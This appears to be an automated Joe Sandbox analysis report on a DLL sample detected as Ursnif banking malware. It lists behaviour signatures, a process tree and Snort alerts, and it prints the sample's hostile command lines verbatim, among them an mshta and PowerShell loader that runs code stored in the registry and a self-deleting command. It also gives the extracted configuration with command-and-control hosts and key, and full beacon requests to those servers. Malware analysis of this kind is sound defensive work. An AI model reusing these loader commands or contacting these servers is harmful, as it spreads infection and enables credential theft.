Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xaj0e933Uv.dll

Overview

General Information

Sample Name:xaj0e933Uv.dll
Analysis ID:620332
MD5:69e570a35f63ea12cbad7a10b25a6ea4
SHA1:f0ca60563eeb9098ad6133daa1fc48c3987437e2
SHA256:3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
Tags:dllgeoGoziISFBITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1900 cmdline: loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5132 cmdline: rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4084 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3504 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 6592 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • mshta.exe (PID: 6548 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.50494a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.5596b40.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.5596b40.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.55694a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.2.rundll32.exe.3430000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/04/22-16:27:54.122082 05/04/22-16:27:54.122082
                      SID:2033203
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:27:53.231327 05/04/22-16:27:53.231327
                      SID:2033203
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:27:53.642851 05/04/22-16:27:53.642851
                      SID:2033203
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:27:33.120656 05/04/22-16:27:33.120656
                      SID:2033203
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: xaj0e933Uv.dllVirustotal: Detection: 40%Perma Link
                      Source: xaj0e933Uv.dllReversingLabs: Detection: 47%
                      Machine Learning detection for sample
                      Source: xaj0e933Uv.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: xaj0e933Uv.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49769 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49769 -> 185.189.151.28:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/
                      Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS
                      Source: rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/CXrN03_2FVmE00A0jBbCC/p4SMYAv6bGfrxOGb/gRNWHNhEtgY8LT7/5NqawS2a2mm
                      Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000012.00000003.416459549.000001E6362BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
                      Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03431CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
